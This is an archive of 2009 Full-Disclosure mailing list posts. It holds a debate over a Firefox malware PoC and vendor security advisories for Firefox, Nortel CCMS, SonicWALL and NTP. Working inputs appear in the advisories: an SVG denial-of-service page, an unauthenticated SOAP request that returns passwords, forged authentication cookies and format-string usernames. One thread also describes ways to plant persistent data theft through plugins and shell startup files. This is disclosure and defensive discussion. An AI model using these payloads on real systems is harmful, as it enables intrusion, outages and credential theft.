Re: [Full-disclosure] FFSpy, a firefox malware PoC
On Wed, May 20, 2009 at 6:12 AM, saphex sap...@gmail.com wrote: I think this is interesting, http://myf00.net/?p=18 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc. then he can do anything he wants anyway. This is nothing new. It was well known always that Firefox plugins can also be made to do malicious things such as steal passwords, sniff data before it gets encrypted in SSL, etc. Absolutely nothing new. The same holds true for a user downloading malicious software on his own and running it on his system. It is true that most users don't verify the source code before running. But this is not anything specific to Firefox. This holds true for any open source or closed source software users download. So, again FFSpy sniffing data is nothing new. From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. This is like claiming, I have found an interesting attack which involves modifying XYZ program or DLL or script on the system that would sniff data and send it to a remote server. I name it ComputerSPY. This is very lame. Of course if you have access to modify or create stuff in the system, you can do anything. Nothing new at all. What is the point of the POC? What is the PoC trying to achieve? Is the POC trying to tell us something that we already don't know? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
On the iPhone a new app came out called MobileSpy. Designed to secretly record all activity on the iPhone. OMG The iPhone now has spyware etc. No the user must 1. Jailbreak his phone 2. Download and install the Mobilespy application. Recently a person told me that stupidity is a capital crime. We see that evermore here. These days we are worried about drive-by downloads. Spyware in the form of Mozilla Firefox has been an issue for a while. James On Tue, May 26, 2009 at 9:28 AM, Shell Code technobus...@gmail.com wrote: On Wed, May 20, 2009 at 6:12 AM, saphex sap...@gmail.com wrote: I think this is interesting, http://myf00.net/?p=18 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc. then he can do anything he wants anyway. This is nothing new. It was well known always that Firefox plugins can also be made to do malicious things such as steal passwords, sniff data before it gets encrypted in SSL, etc. Absolutely nothing new. The same holds true for a user downloading malicious software on his own and running it on his system. It is true that most users don't verify the source code before running. But this is not anything specific to Firefox. This holds true for any open source or closed source software users download. So, again FFSpy sniffing data is nothing new. From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. This is like claiming, I have found an interesting attack which involves modifying XYZ program or DLL or script on the system that would sniff data and send it to a remote server. I name it ComputerSPY. This is very lame. Of course if you have access to modify or create stuff in the system, you can do anything. Nothing new at all. What is the point of the POC? What is the PoC trying to achieve? Is the POC trying to tell us something that we already don't know? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
From the low-hanging-fruit-department Firefox et al. Denial of Service - All versions supporting SVG CHEAP Plug : You are invited to participate in HACK.LU 2009, a small but concentrated luxemburgish security conference. More information : http://www.hack.lu CFP is open, sponsorship is still possible and warmly welcomed! Release mode: Forced release. Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html Vendor : http://www.firefox.com Status : No patch CVE : none provided Credit : none Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615 Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW Notification to patch window : x+n Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html Affected products : - Firefox all supporting SVG (didn't care to investigate which, task of the vendor) - all software packages using mozilla engine and allowing SVG I. Background ~ Firefox is a popular internet browser. II. Description ~~~ This bug is a typical result of what we call unclamped loop. An attacker will give the Radius value of the Circle attribute a very big value. That is leetness. Stack trace : ntkrnlpa.exe+0x6e9ab ntkrnlpa.exe!MmIsDriverVerifying+0xbb0 hal.dll+0x2ef2 xul.dll!NS_InvokeByIndex_P+0x30c36 xul.dll!NS_InvokeByIndex_P+0x30e8a xul.dll!NS_InvokeByIndex_P+0x30e02 xul.dll!NS_InvokeByIndex_P+0x30f5e xul.dll!XRE_InitEmbedding+0x7858 xul.dll!XRE_InitEmbedding+0xf4ee xul.dll!XRE_TermEmbedding+0x11411 xul.dll!gfxTextRun::Draw+0xdd4d xul.dll!gfxTextRun::Draw+0xe1ca xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495 xul.dll!gfxTextRun::SetSpaceGlyph+0x2678 xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3 xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6 xul.dll!NS_StringCopy_P+0x9942 xul.dll!gfxImageSurface::gfxImageSurface+0x3188 xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8 Also produces exceptions in MOZCRT19... MOZCRT19!modf+0x2570: 600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef III. Impact ~~~ Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any (hail to the web 2.0) might be lost. IV. Proof of concept (hold your breath) ~~~ html xmlns='http://www.w3.org/1999/xhtml' head /head body svg xmlns='http://www.w3.org/2000/svg'circle cx='10' cy='10' r='1.79769313486231E+308' fill='red' //svg /body/html IV. Disclosure timeline ~ DD/MM/ 18/11/2008 : Created bugzilla entry (security) with proof of concept, description the terms under which ooperate and the planned disclosure date. 24/22/2008 : Daniel Veditz comments : Might be a cairo bug rather than SVG (seems to be looping in libthebes), but I can definitely confirm the DoS. 14/12/2008 : Ask for any action plan and my assessement of considering it low risk No reply. 28/12/2008 : Timeless comments [..] personally, i intend to open this bug to the public [..] a bug like this is more likely to be fixed by being visible to more people than by leaving it in a closet. 26/05/2009 : In 2009 I agree; release of this advisory. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
Hi Sub, S does not work on firefox 3.0.10, tested Reproduced the bug on 3.0.10 prior to posting. -- http://blog.zoller.lu Thierry Zoller ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
On Tue, May 26, 2009 at 8:38 PM, Shell Code technobus...@gmail.com wrote: I would appreciate if you post replies to the list instead of sending it only to me. My comments inline. On Tue, May 26, 2009 at 5:10 PM, saphex sap...@gmail.com wrote: I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc If you gain access to a system with the user that isn't administrator (at least under systems that enforce user *differentiation*, read any Linux flavour and Vista), you only have access to the users folder, you can't install anything (especially under Linux). I guess this is meant to be an alternative way of getting the job done. This is not true. You can carry out attacks of the same severity by gaining access to a Linux or Windows system as a user that isn't the administrator. Here are a few examples: 1. Modify a vim, emacs, KDE, GNome, etc. plugin that the user uses so that it sends user's personal content (data, files, commands executed, etc.) from the system to a remote server. 2. Put a malicious executable file or script in the user's home directory and execute it from start up scripts (.bashrc, .bash_profile, etc.) so that the malicious executable file executes whenever the user logs in. Now this malicious file can send user's personal content to a remote server. 3. Modify or put plugins for other software to malicous stuff. Similar to point 1. 4. Override PATH settings, aliases, put scripts, etc. so that when the 'ls' now executes 'rm' or some other malicious command so that user ends up executing commands he did not intend to. 5. ... and much more ... From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. To you know the download and execute payload for exploits? Make an application that changes the files, then use that payload in some exploit. People just want everything done. Just click, download, use, and call them self l33ts . How is it any different from the attack scenarios I have explained in case of vim, emacs, KDE, GNome, Linux shell, etc.? Maybe this is nothing new, but I think that the way to do it is new. Because you don't install anything, and the point to be proven here is that Firefox add-on system is security flawed from the very beginning. So, are you saying vim, emacs and the plugin system of every other software on the earth is security flawed from the very beginning? I believe saphex or the author of the so-called-PoC, Duarte Silva do not understand the concept of privileges and security vulnerabilities. By the way, are saphex and Duarte Silva two different persons or saphex == Duarte Silva? Coming back to the topic of privileges, any Firefox addon runs in the context of the user running the browser. So, the addon can do whatever the user running the browser can. The same holds true for plugins of other software too as Shell Code has correctly explained. For example, an emacs plugin can do whatever the user running the emacs can. So, if saphex or Duarte Silva argues that this is a security flaw in Firefox addon mechanism, they will also argue that this is a security flaw in emacs, Windows, Eclipse and every other OS and software. Such an argument, without any doubt, is lame and stupid as most people trained in computer security would agree. -- Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - by Albert Einstein. -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-1 :: Nortel Contact Center Manager Server Password Disclosure Vulnerability
SEC Consult Security Advisory 20090525-1 == title: Nortel Contact Center Manager Server Password Disclosure program: Nortel Contact Center Manager Server vulnerable version: 6.0 homepage: http://www.nortel.com/ccms found: 2008-11-14 by: David Matscheko / SEC Consult Vulnerability Lab permanent link: https://www.sec-consult.com/advisories_e.html#a57 == Vendor description: --- Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions. [source: http://www.nortel.com/ccms] Vulnerability overview: --- The Nortel Contact Center Manager Server web application provides a SOAP interface. This interface does not need authorisation and responds to certain requests with sensitive information. Vulnerability description: -- The following SOAP request queries the user data for the user sysadmin: --- POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx HTTP/1.1 Host: 10.1.2.3 Content-Type: text/xml; charset=utf-8 SOAPAction: http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper; Content-Length: 661 ?xml version=1.0 encoding=utf-8? soap:Envelope xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd=http://www.w3.org/2001/XMLSchema; xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/; soap:Body SOAPWrapperCommon_UsersWS_GetServers_Wrapper xmlns=http://SoapWrapperCommon.CCMA.Applications.Nortel.com; ccmaUserNamestring/ccmaUserName clientIPstring/clientIP componentIDstring/componentID sessionIDstring/sessionID strUserIDstring/strUserID strPasswordstring/strPassword /SOAPWrapperCommon_UsersWS_GetServers_Wrapper /soap:Body /soap:Envelope --- The following is an excerpt of the response to the previous query. It contains the user sysadmin with the corresponding password (password, server IP address, and server name has been changed): --- lt;rs:datagt; lt;z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3' ServerDescription='abcd01' ServerUserID='sysadmin' ServerPassword='pwd4hugo' ServerType='1' SystemVersion='6.0' OpenQueue='0' HeteroNetworking='0' Network='0' ServerSWBuild='4.4F' ServerSULevel='CCMS_6.0_SU_05' ServerDPLevel='CCMS_6.0_SUS_0503' BasicIVR='1' GracePeriodState='3' RefreshIntervalsElapsed='0'/gt; lt;/rs:datagt; --- Proof of concept: - This vulnerability can be exploited with a web browser and plugins / web proxy. Vulnerable versions: The version tested was 06.00.004.03 with the following updates applied: CCMA_6.0_SU_05 CCMA_6.0_SUS_0501 CCMA_6.0_SUS_0502 Prior versions are most likely also vulnerable. Vendor contact timeline: January 2009: Vendor informed about vulnerability 2009-05-14: Patch available 2009-05-25: Public Release Patch: -- The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions. URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAILid=905808 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF David Matscheko / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-4 :: SonicOS Format String Vulnerability
SEC Consult Security Advisory 20090525-4 == title: SonicOS Format String Vulnerability program: SonicWALL Global VPN Client vulnerable version: PRO 4100 SonicOS 4.0.0.2-51e Standard and Enhanced possibly other versions homepage: http://www.sonicwall.com found: October 2006 by: lofi42 permanent link: https://www.sec-consult.com/advisories_e.html#a54 == Product description: SonicOS Enhanced (SonicOSe) is the latest version of SonicWALL's powerful SonicOS operating system, designed for the next generation of SonicWALL firewall/VPN appliances. Vulnerability overview: --- A format string vulnerability exists in the logfile parsing function of SonicOS. An attacker could crash the system or execute arbitrary code by injecting format string metacharacters into the logfile, if an administrator subsequently uses the SonicOS GUI to view the log. Proof of concept: - There are multiple ways to inject format string characters into the logs. The following methods can be used to test for the vulnerability: 1. CFS: Add ebay.com to your Forbidden Domains and access http://www.ebay.com/%s%s%s%s%s%s/. 2. GroupVPN: Establish an GroupVPN Tunnel and enter at the XAUTH Username %s%s%s%s%s. 3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s %s%s%s%s. SEC Consult will not release code execution exploits for this vulnerability to the public. Vendor contact timeline: 2006: Vulnerability found 2006.10.25: Vulnerability first reported to vendor 2009.02.17: Vulnerability reported to vendor again 2009.03.16: Request for status update 2009.04.21: Request for status update 2009.05.25: Public Release Patch: -- SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround. -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200905-08 ] NTP: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200905-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: NTP: Remote execution of arbitrary code Date: May 26, 2009 Bugs: #263033, #268962 ID: 200905-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple errors in the NTP client and server programs might allow for the remote execution of arbitrary code. Background == NTP contains the client and daemon implementations for the Network Time Protocol. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/ntp 4.2.4_p7 = 4.2.4_p7 Description === Multiple vulnerabilities have been found in the programs included in the NTP package: * Apple Product Security reported a boundary error in the cookedprint() function in ntpq/ntpq.c, possibly leading to a stack-based buffer overflow (CVE-2009-0159). * Chris Ries of CMU reported a boundary error within the crypto_recv() function in ntpd/ntp_crypto.c, possibly leading to a stack-based buffer overflow (CVE-2009-1252). Impact == A remote attacker might send a specially crafted package to a machine running ntpd, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the daemon, or a Denial of Service. NOTE: Successful exploitation requires the autokey feature to be enabled. This feature is only available if NTP was built with the 'ssl' USE flag. Furthermore, a remote attacker could entice a user into connecting to a malicious server using ntpq, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround == You can protect against CVE-2009-1252 by disabling the 'ssl' USE flag and recompiling NTP. Resolution == All NTP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/ntp-4.2.4_p7 References == [ 1 ] CVE-2009-0159 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159 [ 2 ] CVE-2009-1252 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200905-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-3 :: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory 20090525-3 == title: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability program: SonicWALL Global VPN Client vulnerable version: Global VPN Client = 4.0.0.835 possibly other versions homepage: http://www.sonicwall.com found: October 2006 by: lofi42 permanent link: https://www.sec-consult.com/advisories_e.html#a55 == Vendor description: --- The SonicWALL Global VPN Client offers an easy-to-use, easy-to-manage Virtual Private Network (VPN) solution that provides users at distributed locations with secure, reliable remote access via broadband, wireless and dial-up connections. [source: http://www.sonicwall.com/downloads/Global_VPN_DS_US.pdf] Vulnerability overview: --- A local privilege escalation vulnerability exists in SonicWALL Global VPN client. By exploiting this vulnerability, a local attacker could execute code with LocalSystem privileges. Vulnerability description: -- During installation of SonicWALL Global VPN Client permissions for installation folder %ProgramFiles%\SonicWALL\SonicWALL Global VPN Client by default are set to Everyone:Full Control without any warning. The Service RampartSvc is started from this folder. Services are started under LocalSystem account. There is no protection of service files. It's possible for unprivileged users to replace service executable with the file of his choice to get full access with LocalSystem privileges. Proof of concept: - This vulnerability can be exploited without any special exploit code. Vendor contact timeline: 2006: Vulnerability found 2006.10.25: Vulnerability first reported to vendor 2009.02.17: Vulnerability reported to vendor again 2009.03.16: Request for status update 2009.04.21: Request for status update 2009.05.25: Public Release Patch: -- SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround. -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-2 :: SonicWALL Global Security Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory 20090525-2 == title: SonicWALL Global Security Client Local Privilege Escalation Vulnerability program: SonicWALL Global Security Client vulnerable version: 1.0.0.15 and possibly other versions homepage: http://www.sonicwall.com found: October 2006 by: lofi42 permanent link: https://www.sec-consult.com/advisories_e.html#a56 == Vendor description: --- The SonicWALL Global Security Client offers IT professionals the capability to manage a mobile user’s online access, based upon corporate policies, in order to ensure optimal security of the network and maximize network resources. Instant messaging, high-risk Web sites and network file access can all be allowed or disallowed as security and productivity concerns dictate. [source: http://www.sonicwall.com/downloads/DS_GlobalSecurityClient_A4.pdf] Vulnerability overview: --- Local exploitation of a design error in SonicWALLs Global Security Client could allow attackers to obtain increased privileges. Vulnerability description: -- The problem specifically exists because SYSTEM privileges are not dropped when accessing the GSC properties from the System Tray applet. The vulnerability can be exploited by right-clicking the System Tray icon, choosing Log, right click Event Viewer, Open Log File The opened file selected can be abused by navigating to C:\WINDOWS \SYSTEM32\, right-clicking cmd.exe, then selecting Open; doing so spawns a command shell with SYSTEM privileges. Proof of concept: - This vulnerability can be exploited without any special exploit code. Vendor contact timeline: 2006: Vulnerability found 2006.10.25: Vulnerability first reported to vendor 2009.02.17: Vulnerability reported to vendor again 2009.03.16: Request for status update 2009.04.21: Request for status update 2009.05.25: Public Release Patch: -- SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround. -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-0 :: Nortel Contact Center Manager Server Authentication Bypass Vulnerability
SEC Consult Security Advisory 20090525-0 == title: Nortel Contact Center Manager Server Authentication Bypass program: Nortel Contact Center Manager Server vulnerable version: 6.0 homepage: http://www.nortel.com/ccms found: 2008-11-14 by: Bernhard Mueller / SEC Consult Vulnerability Lab permanent link: https://www.sec-consult.com/advisories_e.html#a58 == Vendor description: --- Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions. [source: http://www.nortel.com/ccms] Vulnerability overview: --- The Nortel Contact Center Manager Server web application relies on client side cookies to check the roles of authenticated users. Authentication can be bypassed by manually setting the required cookies. By exploiting this vulnerability, an attacker can bypass authentication and access the Nortel Contact Center Manager Server. Vulnerability description: -- The following cookies have to be set to access all menu items: LoginMsgSwitch=True LoginMsgAccepted=True Logged=True isAdmin=True LoginMsgSwitch=True LoginMsgAccepted=True IsConfig=1 IsUser=1 IsRTD=1 IsReport=1 IsScript=1 IsAudit=1 IsEmHelp=1 isOutbound=1 UserID=x AuditSwitch=on LoginMsgAccepted=True Proof of concept: - This vulnerability can be exploited with a web browser and plugins / web proxy. Vulnerable versions: The version tested was 06.00.004.03 with the following updates applied: CCMA_6.0_SU_05 CCMA_6.0_SUS_0501 CCMA_6.0_SUS_0502 Prior versions are most likely also vulnerable. Vendor contact timeline: January 2009: Vendor informed about vulnerability 2009-05-14: Patch available 2009-05-25: Public Release Patch: -- The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions. URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAILid=905698 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
I would appreciate if you post replies to the list instead of sending it only to me. My comments inline. On Tue, May 26, 2009 at 5:10 PM, saphex sap...@gmail.com wrote: I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc If you gain access to a system with the user that isn't administrator (at least under systems that enforce user *differentiation*, read any Linux flavour and Vista), you only have access to the users folder, you can't install anything (especially under Linux). I guess this is meant to be an alternative way of getting the job done. This is not true. You can carry out attacks of the same severity by gaining access to a Linux or Windows system as a user that isn't the administrator. Here are a few examples: 1. Modify a vim, emacs, KDE, GNome, etc. plugin that the user uses so that it sends user's personal content (data, files, commands executed, etc.) from the system to a remote server. 2. Put a malicious executable file or script in the user's home directory and execute it from start up scripts (.bashrc, .bash_profile, etc.) so that the malicious executable file executes whenever the user logs in. Now this malicious file can send user's personal content to a remote server. 3. Modify or put plugins for other software to malicous stuff. Similar to point 1. 4. Override PATH settings, aliases, put scripts, etc. so that when the 'ls' now executes 'rm' or some other malicious command so that user ends up executing commands he did not intend to. 5. ... and much more ... From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. To you know the download and execute payload for exploits? Make an application that changes the files, then use that payload in some exploit. People just want everything done. Just click, download, use, and call them self l33ts . How is it any different from the attack scenarios I have explained in case of vim, emacs, KDE, GNome, Linux shell, etc.? Maybe this is nothing new, but I think that the way to do it is new. Because you don't install anything, and the point to be proven here is that Firefox add-on system is security flawed from the very beginning. So, are you saying vim, emacs and the plugin system of every other software on the earth is security flawed from the very beginning? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
For those that failed to reproduce, try naming the POC file with an XHTML extension. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
ok On Tue, May 26, 2009 at 4:08 PM, Shell Code technobus...@gmail.com wrote: I would appreciate if you post replies to the list instead of sending it only to me. My comments inline. On Tue, May 26, 2009 at 5:10 PM, saphex sap...@gmail.com wrote: I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc If you gain access to a system with the user that isn't administrator (at least under systems that enforce user *differentiation*, read any Linux flavour and Vista), you only have access to the users folder, you can't install anything (especially under Linux). I guess this is meant to be an alternative way of getting the job done. This is not true. You can carry out attacks of the same severity by gaining access to a Linux or Windows system as a user that isn't the administrator. Here are a few examples: 1. Modify a vim, emacs, KDE, GNome, etc. plugin that the user uses so that it sends user's personal content (data, files, commands executed, etc.) from the system to a remote server. 2. Put a malicious executable file or script in the user's home directory and execute it from start up scripts (.bashrc, .bash_profile, etc.) so that the malicious executable file executes whenever the user logs in. Now this malicious file can send user's personal content to a remote server. 3. Modify or put plugins for other software to malicous stuff. Similar to point 1. 4. Override PATH settings, aliases, put scripts, etc. so that when the 'ls' now executes 'rm' or some other malicious command so that user ends up executing commands he did not intend to. 5. ... and much more ... From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. To you know the download and execute payload for exploits? Make an application that changes the files, then use that payload in some exploit. People just want everything done. Just click, download, use, and call them self l33ts . How is it any different from the attack scenarios I have explained in case of vim, emacs, KDE, GNome, Linux shell, etc.? Maybe this is nothing new, but I think that the way to do it is new. Because you don't install anything, and the point to be proven here is that Firefox add-on system is security flawed from the very beginning. So, are you saying vim, emacs and the plugin system of every other software on the earth is security flawed from the very beginning? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
ok On Tue, May 26, 2009 at 4:30 PM, David Blanc davidblanc1...@gmail.com wrote: On Tue, May 26, 2009 at 8:38 PM, Shell Code technobus...@gmail.com wrote: I would appreciate if you post replies to the list instead of sending it only to me. My comments inline. On Tue, May 26, 2009 at 5:10 PM, saphex sap...@gmail.com wrote: I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc If you gain access to a system with the user that isn't administrator (at least under systems that enforce user *differentiation*, read any Linux flavour and Vista), you only have access to the users folder, you can't install anything (especially under Linux). I guess this is meant to be an alternative way of getting the job done. This is not true. You can carry out attacks of the same severity by gaining access to a Linux or Windows system as a user that isn't the administrator. Here are a few examples: 1. Modify a vim, emacs, KDE, GNome, etc. plugin that the user uses so that it sends user's personal content (data, files, commands executed, etc.) from the system to a remote server. 2. Put a malicious executable file or script in the user's home directory and execute it from start up scripts (.bashrc, .bash_profile, etc.) so that the malicious executable file executes whenever the user logs in. Now this malicious file can send user's personal content to a remote server. 3. Modify or put plugins for other software to malicous stuff. Similar to point 1. 4. Override PATH settings, aliases, put scripts, etc. so that when the 'ls' now executes 'rm' or some other malicious command so that user ends up executing commands he did not intend to. 5. ... and much more ... From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. To you know the download and execute payload for exploits? Make an application that changes the files, then use that payload in some exploit. People just want everything done. Just click, download, use, and call them self l33ts . How is it any different from the attack scenarios I have explained in case of vim, emacs, KDE, GNome, Linux shell, etc.? Maybe this is nothing new, but I think that the way to do it is new. Because you don't install anything, and the point to be proven here is that Firefox add-on system is security flawed from the very beginning. So, are you saying vim, emacs and the plugin system of every other software on the earth is security flawed from the very beginning? I believe saphex or the author of the so-called-PoC, Duarte Silva do not understand the concept of privileges and security vulnerabilities. By the way, are saphex and Duarte Silva two different persons or saphex == Duarte Silva? Coming back to the topic of privileges, any Firefox addon runs in the context of the user running the browser. So, the addon can do whatever the user running the browser can. The same holds true for plugins of other software too as Shell Code has correctly explained. For example, an emacs plugin can do whatever the user running the emacs can. So, if saphex or Duarte Silva argues that this is a security flaw in Firefox addon mechanism, they will also argue that this is a security flaw in emacs, Windows, Eclipse and every other OS and software. Such an argument, without any doubt, is lame and stupid as most people trained in computer security would agree. -- Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - by Albert Einstein. 